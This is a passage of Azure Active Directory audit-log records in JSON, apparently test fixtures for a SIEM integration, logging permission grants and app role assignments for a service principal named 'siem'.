{"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": ""}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": ""}, {"NewValue": "", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": ""}, {"NewValue": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}, {"Name": "targetName", "Value": "Microsoft Graph"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":null,\"ObjectClass\":\"ServicePrincipal\",\"AppId\":null,\"Name\":null}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.3343965Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43118019"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add OAuth2PermissionGrant.", "Id": "ad12e6ca-cb87-4bc5-8103-dbc83cb9a4f8"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-10T15:30:06.1843731Z"}, {"Name": "env_epoch", "Value": "38FW7"}, {"Name": "env_seqNum", "Value": "43117912"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR57"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "678f80a3-92c4-4bb6-83a1-1c39d5a87225"}
-{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-10T15:30:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "654d7080-aee6-4826-abd9-c5710b336614"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 